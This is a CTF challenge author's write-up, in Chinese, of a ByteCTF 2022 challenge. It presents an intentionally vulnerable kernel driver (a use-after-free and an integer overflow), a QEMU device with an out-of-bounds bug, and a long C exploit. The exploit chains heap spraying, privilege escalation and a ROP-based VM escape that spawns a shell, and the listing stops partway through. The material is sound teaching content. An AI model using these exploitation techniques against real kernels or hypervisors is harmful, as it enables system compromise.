【CTF.0x07】ByteCTF2022 byte_run 出题手记

本文最后更新于:2022年11月24日 凌晨

前年👴当选手的时候还有⑤⭐级的带🏨住,今年当出题人👴只能喝西北风

0x00.一切开始之前

作为一名安全研究员,笔者不知道为什么进了字节跳动当开发,于是就不知道为什么又跑去帮 ByteCTF 出题了(笑)

其实这道题最初的灵感来自于 Google CTF 2021 的一道名为 “fullchain” 的题目,那是一道 chrome v8 + mojo sandbox escape + kernel primitive 的题目,一条非常完整的利用链,笔者觉得非常帅气(笑)

笔者也一直想出一道比较「完整」(full chain)的题目,不过限于自身技术水平较低的缘故再加上这一次的出题时间比较短,于是只弄好了“后端利用”的部分——「Linux kernel提权」 + 「QEMU逃逸」

“后端利用”是笔者临时生造的词,仅在这篇文章的开头表示「拿到了远端代码执行权限之后的利用部分」(笑)

  • kernel 部分的灵感来自于 CVE-2022-0847,也就是“dirty pipe”,笔者模仿内核的 pipe 结构自己写了一个简化版的 pipe,并留下了一个 UAF 漏洞
  • QEMU 部分则主要是一个提供存储功能的“块设备”,漏洞则是非常明显的整数溢出导致的越界读写

在笔者看来整体难度其实并不算太大(因为当笔者开始出这道题目的时候出题时间已经所剩无几了,那时候其实没想出啥好的点子XD),所以在其他出题人都在文档里写“难度中等”的时候只有笔者一个人写了“难度简单”,从最终的解题情况来看的话 这一次整个 pwn 的出题好像都不咋能吸引大佬来做……

本次题目源码已经全部开源:https://github.com/arttnba3/ByteCTF2022_PWN-ByteRun

0x01.题目分析

u1s1,这一次编译出来的代码再反汇编之后确实比较难看,哪怕是笔者作为出题人尝试逆了一下也没能在短时间内看明白整个题目的运行逻辑(笑)

一、内核模块部分

笔者一开始就想写一个功能上比较完整的设备驱动,于是包括与设备交互那一块的代码也集成在了内核模块中,不过在这里笔者设定了驱动存在着两种运行模式:流(stream)模式和块(block)模式,其中前者是与设备无关的管道功能部分,后者则是与设备交互的部分,但是后者的功能需要 root 权限才能开启,于是第一个任务就是内核提权;)

在模块初始化函数当中为 PCI 设备进行了相应的接口注册:

1
2
3
4
5
6
static int __init bytedev_init(void)
{
//...
/* register pci driver */
return pci_register_driver(&bytedev_driver);
}

当一个新的 bytedev 设备插进来的时候,内核便会遍历接口比对 BTF,最后调用到我们的初始化函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
static const struct pci_device_id bytedev_ids[] = {
{ PCI_DEVICE(PCI_VENDOR_ID_BYTEDEV, PCI_DEVICE_ID_BYTEDEV) },
{ 0, },
};

MODULE_DEVICE_TABLE(pci, bytedev_ids);

static struct pci_driver bytedev_driver = {
.name = "bytedev",
.id_table = bytedev_ids,
.probe = bytedev_pci_probe,
.remove = bytedev_pci_remove,
};

对于每个插上来的 bytedev 类型的设备,驱动都会动态生成一个对应的结构 bytedev,并使用 pci_request_regions() 等函数进行资源的探测与占用,从而使得无法直接通过在用户态进程打开设备资源文件的方式与设备进行交互

其实可以通过提权后卸载内核模块的方式来重新实现直接通过设备资源文件与设备进行交互,但实际上在内核模块当中笔者早已封装好了所需要使用的接口(笑)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
static int bytedev_pci_probe(struct pci_dev *pdev,
const struct pci_device_id *id)
{
struct bytedev *bdev;
struct device *dev_node;
char dname[BYTEDEV_DEVNAME_LENGTH];
int minor_num;
int err;

printk(KERN_INFO "[bytedev:] ByteDance pci device detected!");

/* alloc space for bytedev struct*/
if (!(bdev = kzalloc(sizeof(struct bytedev), GFP_KERNEL))) {
err = -ENOMEM;
goto err_no_mem;
}

pci_set_drvdata(pdev, bdev);

/* enable the device */
if ((err = pci_enable_device(pdev))) {
printk(KERN_ERR "[bytedev:] Cannot enable PCI device, abort.");
goto err_out_free_dev;
}

/* check for MMIO flags on BAR 0 */
if (!(pci_resource_flags(pdev, 0) & IORESOURCE_MEM)) {
printk(KERN_ERR
"[bytedev:] Cannot find PCI device base address for MMIO, abort.");
err = -ENODEV;
goto err_out_disable_pdev;
}

/* check for PMIO flags on BAR 1 */
if (!(pci_resource_flags(pdev, 1) & IORESOURCE_IO)) {
printk(KERN_ERR
"[bytedev:] Cannot find PCI device base address for PMIO, abort.");
err = -ENODEV;
goto err_out_disable_pdev;
}

/* request for PCI bar spaces */
if ((err = pci_request_regions(pdev, DRV_NAME))) {
printk(KERN_ERR "Cannot obtain PCI resources, abort.");
goto err_out_disable_pdev;
}

/* iomap for mmio space */
bdev->mmio_addr = pci_ioremap_bar(pdev, 0);
if (!bdev->mmio_addr) {
printk(KERN_ERR "Cannot ioremap for MMIO space, abort.");
err = -ENOMEM;
goto err_out_free_region;
}

/* get I/O ports base */
bdev->io_base = pci_resource_start(pdev, 1);

/* register device node */
minor_num = bytedev_get_unused_minor_num();

if (minor_num < 0) {
printk(KERN_ERR "[bytedev:] bytedev amount limits!");
goto err_out_iounmap_mmio;
}
else if (minor_num == 0) {
snprintf(dname, sizeof(dname), "%s", DEVICE_NAME);
} else{
snprintf(dname, sizeof(dname), "%s%d", DEVICE_NAME, minor_num);
}

dev_node = device_create(bytedev_class, NULL,
MKDEV(bytedev_major_num, minor_num),
NULL, dname);
if (IS_ERR(dev_node)) {
printk(KERN_ERR "[bytedev:] Failed to create the device!");
err = PTR_ERR(dev_node);
goto err_out_unuse_minor;
}

/* other data init */
spin_lock_init(&bdev->dev_lock);
memset(bdev->data_queue, 0, sizeof(void*) * BYTEDEV_MAX_BUFS);
bdev->head_idx = 0;
bdev->tail_idx = 0;

/* info records */
bdev->pdev = pdev;
bdev->dev_node = dev_node;
bdev->minor_num = minor_num;
bytedev_arr[minor_num] = bdev;

printk(KERN_INFO "[bytedev:] bytedev%d register complete.", minor_num);

return 0;

err_out_unuse_minor:
bytedev_set_unused_minor_num(minor_num);
err_out_iounmap_mmio:
pci_iounmap(pdev, bdev->mmio_addr);
err_out_free_region:
pci_release_regions(pdev);
err_out_disable_pdev:
pci_disable_device(pdev);
err_out_free_dev:
kfree(bdev);
err_no_mem:
return err;
}

其中 bytedev 结构体定义如下:

1
2
3
4
5
6
7
8
9
10
11
struct bytedev {
struct device *dev_node;
struct pci_dev *pdev;
int minor_num;
u64 __iomem *mmio_addr;
u64 io_base;

spinlock_t dev_lock;
struct bytedev_data *data_queue[BYTEDEV_MAX_BUFS];
int head_idx, tail_idx;
};

对于流模式而言,其使用一个环形队列 data_queue 来实现进程间的数据传递,我们可以直接通过读写设备文件来实现对环形队列的数据读写,其本质上是一个如下结构的指针数组:

1
2
3
4
struct bytedev_data {
unsigned short len, offset;
char data[0];
};

第一个漏洞便存在于读的过程当中,在读的过程中存在一个 UAF 漏洞,从而导致读取完数据后对应的 buffer 并没有被释放,但是在正常地对该功能的使用上并不会造成影响,因为 slub allocator 并不似 ptmalloc 那样恒定使用前 8 字节来存放 next free object,这使得其统计数据字段得以保留

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
static ssize_t bytedev_stream_read(struct file *f, 
char __user *buf,
size_t size,
loff_t *loff)
{
struct bytedev *dev = f->private_data;
ssize_t ret;
ssize_t rlen = 0;

if (bytedev_queue_empty(dev)) {
ret = -EFAULT;
goto out;
}

while (size > 0) {
struct bytedev_data *d;
unsigned int left, clen;

/**
* If the data queue is already empty,
* just quit out is OK.
*/
if (bytedev_queue_empty(dev)) {
ret = rlen;
goto out;
}

d = dev->data_queue[dev->head_idx];
left = d->len - d->offset;
clen = left > size ? size : left;

ret = copy_to_user(buf + rlen, &d->data[d->offset], clen);
if (ret) {
printk(KERN_ERR "[bytedev:] failed while reading the buffer!");
goto out;
}

size -= clen;
d->offset += clen;
rlen += clen;

if (d->offset == d->len) {
if (d->len == BYTEDEV_BUF_SIZE) {
kfree(d);
/* ther's where we made our basic bug: a UAF */
//dev->data_queue[dev->head_idx] = NULL;
dev->head_idx++;
dev->head_idx %= BYTEDEV_MAX_BUFS;
} else {
ret = rlen;
break;
}
}
}

ret = rlen;

out:

return ret;
}

第二个漏洞则存在于写的过程当中,在对统计数据字段的判定当中存在一个整型溢出漏洞,若是正常使用则仍不会触发这个漏洞,但若是我们可以通过 UAF 修改其为一个较大的值,那么我们就可以让内核模块认为该 buffer 依然有可以写入的空间,从而完成越界写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
static inline int bytedev_queue_last_empty(struct bytedev *dev)
{
int idx = (dev->tail_idx - 1 + BYTEDEV_MAX_BUFS) % BYTEDEV_MAX_BUFS;

if (!dev->data_queue[idx]) {
return 0;
}

/* there's where we made our expand bug: integer overflow */
return (BYTEDEV_BUF_SIZE - dev->data_queue[idx]->len) > 0;

/* the correct version */
//return dev->data_queue[idx]->len < BYTEDEV_BUF_SIZE;
}

static ssize_t bytedev_stream_write(struct file *f,
const char __user *buf,
size_t size,
loff_t *loff)
{
struct bytedev *dev = f->private_data;
ssize_t ret;
ssize_t wlen = 0;

if (bytedev_queue_full(dev)) {
ret = -EFAULT;
goto out;
}

while (size > 0) {
struct bytedev_data *d;
unsigned int left, clen;
int d_idx;

/**
* If the data queue is already full,
* just quit out is OK.
*/
if (bytedev_queue_full(dev)) {
ret = wlen;
goto out;
}

/**
* Fill the unused part of last buffer.
* We mainly fill the data that is less than BYTEDEV_BUF_SIZE there.
*/
if (bytedev_queue_last_empty(dev)) {
int d_idx =
(dev->tail_idx - 1 + BYTEDEV_MAX_BUFS) % BYTEDEV_MAX_BUFS;
struct bytedev_data *d = dev->data_queue[d_idx];
unsigned int left = BYTEDEV_BUF_SIZE - d->len;
unsigned int clen = left > size ? size : left;

ret = copy_from_user(&d->data[d->len], buf + wlen, clen);
if (ret) {
printk(KERN_ERR "[bytedev:] failed while writing the buffer!");
goto out;
}

size -= clen;
d->len += clen;
wlen += clen;

continue;
}

/**
* When we arrive at there, it means that there's no space left
* on the tail buffer, so we alloc a new buffer there.
*/
d_idx = dev->tail_idx;
dev->data_queue[d_idx] =
kmalloc(BYTEDEV_BUF_SIZE + sizeof(struct bytedev_data),
GFP_KERNEL_ACCOUNT);
dev->tail_idx++;
dev->tail_idx %= BYTEDEV_MAX_BUFS;

d = dev->data_queue[d_idx];
d->len = 0;
d->offset = 0;

/* Copy the data there */
left = BYTEDEV_BUF_SIZE;
clen = left > size ? size : left;

ret = copy_from_user(&d->data[d->len], buf + wlen, clen);
if (ret) {
printk(KERN_ERR "[bytedev:] failed while writing the buffer!");
goto out;
}

size -= clen;
d->len += clen;
wlen += clen;
}

ret = wlen;

out:

return ret;
}

二、QEMU 设备部分

第二阶段则是对设备 block 模式下的应用,这里 QEMU 模拟了一个类似于硬盘的设备,我们可以读写指定的扇区(大小为 512 字节)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#define BYTEDEV_SECTOR_SIZE 512
#define BYTEDEV_SECTOR_NUM 256

typedef struct BYTEPCIDevRegs {
int mode;
int blk_idx;
int blk_status;
} BYTEPCIDevRegs;

typedef struct BYTEPCIDevState {
/*< private >*/
PCIDevice parent_obj;

/*< public >*/
BYTEPCIDevRegs regs;

MemoryRegion mmio;
MemoryRegion pmio;

char *blk_mem[BYTEDEV_SECTOR_NUM];
} BYTEPCIDevState;

其中我们使用 PMIO 来实现设备模式的获取与切换、扇区的切换,使用 MMIO 来实现对特定扇区的读写,而漏洞便出在扇区的切换上,虽然设备里有一个后向的扇区索引越界检查,但是存储当前扇区索引所使用的为 int 类型的变量,而设备代码中并没有对索引为负数的情况进行检查,因此我们可以进行前向的越界操作,若是在低地址处存在可利用的指针则可以直接完成越界的读写操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
static void
byte_dev_pmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size)
{
BYTEPCIDevState *ds = BYTEDEV_PCI(opaque);
int op_idx = val;

if (size != 4) {
return ;
}

smp_mb();

switch (addr) {
case BYTEDEV_REG_MODE:
switch (val) {
case BYTEDEV_MODE_BLK:
case BYTEDEV_MODE_STREAM:
ds->regs.mode = val;
break;
default:
return ;
}
break;
case BYTEDEV_REG_BLK_IDX:
if (ds->regs.blk_status == BYTEDEV_BLK_STATUS_BUSY) {
return ;
}

if (ds->regs.mode != BYTEDEV_MODE_BLK) {
return ;
}
/**
* There's where we made our basic bug: OOB rw forward
* Because there's no check for minus idx there.
* */
if (op_idx >= BYTEDEV_SECTOR_NUM) {
return ;
}

ds->regs.blk_idx = op_idx;
ds->regs.blk_status = BYTEDEV_BLK_STATUS_BUSY;
if (!ds->blk_mem[ds->regs.blk_idx]) {
ds->blk_mem[ds->regs.blk_idx] = g_malloc(BYTEDEV_SECTOR_SIZE);
}
ds->regs.blk_status = BYTEDEV_BLK_STATUS_READY;
break;
default:
break;
}

}

0x02.漏洞利用

漏洞的利用存在两个阶段:第一阶段是利用内核模块中流模式存在的漏洞完成提权,第二阶段则是利用模拟设备中存在的漏洞完成虚拟化逃逸

Stage.I - kernel primitive

由于我们直接有 UAF 和越界读写,那么第一阶段的解题思路就比较清晰了,我们可以先写入一个 buffer 后读取出该 buffer 制造出 UAF,之后利用其他结构体改写其数据统计字段,之后再通过越界写进行提权,需要注意的是由于开启了 hardened usercopy 检查,我们需要直接在下一个 object 中进行数据写入,而不能进行跨 object 的数据拷贝

由于分配 buffer 所用的 flag 为 GFP_KERNEL_ACCOUNT,因此最后的提权解法直接套用 CVE-2021-22555 的堆喷 msg_msg + sk_buff 的模板即可

Stage.II - QEMU escape

由于读写过程为通过对应索引的指针完成读写,因此我们需要向前寻找指向合适区域的指针来实现利用,万幸的是我们前向可读的区域中有 MemoryRegion,还有设备结构体的父类 PCIDevice :

利用 MemoryRegion 我们可以泄露出设备自身结构体的地址并读写开头的 512 字节,我们可以在其 io_regions 中的空闲字段构造 ROP 或是一些其他东西

对于 PCIDevice 我们可以利用最上层的父类 Object 的 properties 成员泄露出 glib 的基地址,从而泄露出 glibc 的基地址(其加载地址间偏移固定);同时我们还能通过其 io_regions 字段完成对 MemoryRegion 的读写

那么整个利用思路就非常清晰了:我们先前向读取 properties 泄露出 libc,之后读取 MemoryRegion 泄露出设备结构体地址,在 PCIDevice.io_regions 上构造 fake MemoryRegionOps 后劫持 PMIO 的 MemoryRegion 的 ops 从而完成虚拟机逃逸

FINAL EXPLOIT

最终的 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <signal.h>

#define PRIMARY_MSG_SIZE 0x1000
#define SECONDARY_MSG_SIZE 0x400

#define PRIMARY_MSG_TYPE 0x41
#define SECONDARY_MSG_TYPE 0x42
#define VICTIM_MSG_TYPE 0x1337
#define MSG_TAG 0xAAAAAAAA

#define SOCKET_NUM 8
#define SK_BUFF_NUM 128
#define PIPE_NUM 256
#define MSG_QUEUE_NUM 4096

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

#define ANON_PIPE_BUF_OPS 0xffffffff81e2d980
#define PREPARE_KERNEL_CRED 0xffffffff810bb9c04
#define INIT_CRED 0xffffffff8224aca0
#define COMMIT_CREDS 0xffffffff810bb710
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81a01086
#define POP_RDI_RET 0xffffffff811af57d

#define BYTEDEV_BUF_SIZE (4096 - sizeof(struct bytedev_data))

#define BYTEDEV_MODE_CHANGE 0x114514
#define BYTEDEV_BLK_IDX_CHANGE 0x1919810

#define BYTEDEV_SECTOR_SIZE 512
#define BYTEDEV_SECTOR_NUM 256

#define LIBC_SYSTEM 0x50d60
#define LIBC_MOV_RSP_RDX_RET 0x5a170
#define LIBC_MOV_RDX_PTRRDIADD8_MOV_PTRRSP_RAX_CALL_PTRRDXADD0x20 0x1675b0
#define LIBC_POP_RDI_RET 0x2a3e5
#define LIBC_RET 0x2a3e6
#define LIBC_BIN_SH 0x1d8698
#define LIBC_PUTS 0x80ed0

enum BYTEDEV_MODE {
BYTEDEV_MODE_STREAM = 0,
BYTEDEV_MODE_BLK,
};

struct bytedev_data {
unsigned short len, offset;
char data[0];
};

struct list_head {
uint64_t next;
uint64_t prev;
};

struct msg_msg {
struct list_head m_list;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};

struct msg_msgseg {
uint64_t next;
};

struct {
long mtype;
char mtext[PRIMARY_MSG_SIZE - sizeof(struct msg_msg)];
} primary_msg;

struct {
long mtype;
char mtext[SECONDARY_MSG_SIZE - sizeof(struct msg_msg)];
} secondary_msg;

/**
* skb_shared_info need to take 320 bytes at the tail
* so the max size of buf we should send is:
* 1024 - 320 = 704
*/
char fake_second_msg[704];

struct {
long mtype;
char mtext[0x1000 - sizeof(struct msg_msg) \
+ 0x1000 - sizeof(struct msg_msgseg)];
} oob_msg;

struct pipe_buffer {
uint64_t page;
uint32_t offset, len;
uint64_t ops;
uint32_t flags;
uint32_t padding;
uint64_t private;
};

struct pipe_buf_operations {
uint64_t confirm;
uint64_t release;
uint64_t try_steal;
uint64_t get;
};

size_t user_cs, user_ss, user_rflags, user_sp;

void saveStatus()
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\n\033[0m");
}

void errExit(char *msg)
{
printf("\033[31m\033[1m[x] Error: %s\033[0m\n", msg);
exit(EXIT_FAILURE);
}

int readMsg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, 0);
}

int writeMsg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
*(long*)msgp = msgtyp;
return msgsnd(msqid, msgp, msgsz - sizeof(long), 0);
}

int peekMsg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
int __msgsz = msgsz - sizeof(long);
return msgrcv(msqid, msgp, __msgsz, msgtyp, MSG_COPY | IPC_NOWAIT);
}

void buildMsg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security)
{
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}

int spraySkBuff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (write(sk_socket[i][0], buf, size) < 0) {
printf("[x] failed to spray %d sk_buff for %d socket!", j, i);
return -1;
}
}
}

return 0;
}

int freeSkBuff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (read(sk_socket[i][1], buf, size) < 0) {
puts("[x] failed to received sk_buff!");
return -1;
}
}
}

return 0;
}

void trigerOutOfBoundWrite(int dev_fd, int socket_fd[2])
{
struct bytedev_data *fake_data;
char *trash_data;

/* free the first buffer in bytedev queue */
trash_data = malloc(BYTEDEV_BUF_SIZE);
memset(trash_data, 0x84, BYTEDEV_BUF_SIZE);

printf("[*] write %ld bytes to dev \n",
write(dev_fd, trash_data, BYTEDEV_BUF_SIZE));
printf("[*] read %ld bytes from dev\n",
read(dev_fd, trash_data, BYTEDEV_BUF_SIZE));

/* construct fake bytedev_data */
fake_data = malloc(sizeof(struct bytedev_data) + BYTEDEV_BUF_SIZE);
fake_data->len = BYTEDEV_BUF_SIZE + 1;

puts("[*] re-get the buffer by sk_buff...");
write(socket_fd[0], fake_data, BYTEDEV_BUF_SIZE - 320);

/* make an OOB write */
puts("[*] OOB write to nearby object...");
write(dev_fd, trash_data, 1);

/* to prevent the memory leaking */
free(trash_data);
free(fake_data);
}

void qemuEscape(void)
{
int dev_fd, ret;
uint64_t buf[BYTEDEV_SECTOR_SIZE / sizeof(uint64_t)];
uint64_t fake_ops[BYTEDEV_SECTOR_SIZE / sizeof(uint64_t)];
uint64_t libc_base, opaque, byte_dev_pmio_read;

if ((dev_fd = open("/dev/bytedev", O_RDWR)) < 0) {
errExit("failed to open bytedev!");
}

ioctl(dev_fd, BYTEDEV_MODE_CHANGE, BYTEDEV_MODE_BLK);

/**
* SECTOR -23: container
* XXX: in docker-built Ubuntu 22.04, we cannot leak libc there.
* [55] g_str_hash
* [56] g_str_equal
* SECTOR -24: BYTEPCIDevState
* [27~34] name
* [35~] io_regions[PCI_NUM_REGIONS]
* SECTOR -25: byte_dev_pmio_ops
* [0] byte_dev_pmio_read
* [1] byte_dev_pmio_write
* SECTOR -355 &io_regions[PCI_NUM_REGIONS]
* SECTOR -352 MemoryRegion - mmio
* [4] opaque
* [9] ops
* SECTOR -347 MemoryRegion - pmio
* [4] opaque
* [9] ops
* SECTOR -388
* [8] <g_str_hash>
*/

/**
* Step.I leak basic info
*/

puts("");
puts("\033[34m\033[1m[*] Step.I leak basic\033[0m");

puts("\033[34m\033[1m[*] Reading from -388 sector...\033[0m");

ioctl(dev_fd, BYTEDEV_BLK_IDX_CHANGE, -388);
read(dev_fd, buf, BYTEDEV_SECTOR_SIZE);

if (buf[7] < 0x7f0000000000) {
for (int i = 0; i < BYTEDEV_SECTOR_SIZE / sizeof(uint64_t); i++) {
printf("[--data-dump--][%d] %lx\n", i, buf[i]);
}
errExit("failed to leak libc related ptr!");
}

/* This's the offset on the Ubuntu 22.04: GLIBC 2.35-0ubuntu3.1 */
libc_base = buf[7] - 0x3ea410;

printf("\033[32m\033[1m[+] Got libc_base: \033[0m%lx\n", libc_base);

puts("\033[34m\033[1m[*] Reading from -25 sector...\033[0m");

ioctl(dev_fd, BYTEDEV_BLK_IDX_CHANGE, -25);
read(dev_fd, fake_ops, BYTEDEV_SECTOR_SIZE);
byte_dev_pmio_read = fake_ops[0];
printf("\033[32m\033[1m[+] Got byte_dev_pmio_read: \033[0m%lx\n",
byte_dev_pmio_read);

puts("\033[34m\033[1m[*] Reading from -347 sector...\033[0m");
ioctl(dev_fd, BYTEDEV_BLK_IDX_CHANGE, -347);
read(dev_fd, buf, 10 * sizeof(uint64_t));
opaque = buf[4];
printf("\033[32m\033[1m[+] Got opaque: \033[0m%lx\n", opaque);

/**
* Step.II construct fake pmio->ops
* There we make the opaque.parent_obj.name the ops,
* so that nothing will be effects
*/

puts("");
puts("\033[34m\033[1m[*] Step.II construct fake pmio->ops\033[0m");

ioctl(dev_fd, BYTEDEV_BLK_IDX_CHANGE, -24);
read(dev_fd, buf, BYTEDEV_SECTOR_SIZE);

buf[33] = buf[34] = 0;
strcpy((char*)&buf[33], "ls;cat ./flag;gnome-calculator;/bin/sh");

/* the new rdx starts there */
buf[28] = libc_base + LIBC_POP_RDI_RET;
buf[29] = opaque + 33 * 8;//libc_base + LIBC_BIN_SH;
buf[30] = libc_base + LIBC_SYSTEM;
//buf[31] =
/**
* [rdx + 20]
* mov rsp, rdx ; ret
*/
buf[32] = libc_base + LIBC_MOV_RSP_RDX_RET;

/* the [rdi + 8] */
buf[1] = opaque + 28 * 8;

/* fake ops on bar space */
for (int i = 0; i < 10; i++) {
buf[50 + i] = fake_ops[i];
}
/**
* mov rdx, qword ptr [rdi + 8] ; -> store the ptr in opaque[1]
* mov qword ptr [rsp], rax ;
* call qword ptr [rdx + 0x20] -> another call
*/
buf[51] =
libc_base + LIBC_MOV_RDX_PTRRDIADD8_MOV_PTRRSP_RAX_CALL_PTRRDXADD0x20;

write(dev_fd, buf, BYTEDEV_SECTOR_SIZE);

puts("\033[32m\033[1m[+] Done!\033[0m");

/**
* Step.III change pmio->ops to fake ops on opaque
*/

puts("");
puts("\033[34m\033[1m[*] Step.III change pmio->ops to fake ops\033[0m");

ioctl(dev_fd, BYTEDEV_BLK_IDX_CHANGE, -347);
read(dev_fd, buf, 10 * sizeof(uint64_t));

buf[9] = opaque + 50 * 8;
write(dev_fd, buf, 10 * sizeof(uint64_t));

puts("\033[32m\033[1m[+] Done!\033[0m");

/**
* Step.IV trigger fake pmio->ops.read to escape
* There we need to set opaque[1] to opaque.parent_obj.name
* and do something wonderful there...
*/

puts("");
puts("\033[34m\033[1m[*] Step.IV trigger fake ops to escape\n\033[0m");

//sleep(5);
ioctl(dev_fd, BYTEDEV_MODE_CHANGE, *(size_t*)"arttnba3");
}

void getRootShell(void)
{
if (getuid()) {
errExit("failed to gain the root!");
}

puts("\033[32m\033[1m[+] Succesfully gain the root privilege\033[0m");

puts("\033[34m\033[1m\n[*] Now we come to Stage II - QEMU ESCAPE\033[0m\n");
qemuEscape();

puts("\033[32m\033[1m[+] trigerring root shell now...\033[0m\n");
system("/bin/sh");
exit(EXIT_SUCCESS);
}

int main(int argc, char **argv, char **envp)
{
int oob_socket[2];
int sk_sockets[SOCKET_NUM][2];
int pipe_fd[PIPE_NUM][2];
int msqid[MSG_QUEUE_NUM];
int victim_qid, real_qid;
struct msg_msg *nearby_msg;
struct msg_msg *nearby_msg_prim;
struct pipe_buffer *pipe_buf_ptr;
struct pipe_buf_operations *ops_ptr;
uint64_t victim_addr;
uint64_t kernel_base;
uint64_t kernel_offset;
uint64_t *rop_chain;
int rop_idx;
cpu_set_t cpu_set;
int dev_fd;
int ret;

/**
* Step.0
* Initialization
*/
puts("\033[32m\033[1m\n[+] ByteCTF 2022 - ByteRun - exploit \033[0m\n");
puts("\033[34m\033[1m\n[*] Stage I - ROOT Privilege Escalation. \033[0m\n");

/* basic resources alloc */
saveStatus();

if ((dev_fd = open("/dev/bytedev", O_RDWR)) < 0) {
errExit("failed to open bytedev!");
}

if (socketpair(AF_UNIX, SOCK_STREAM, 0, oob_socket) < 0) {
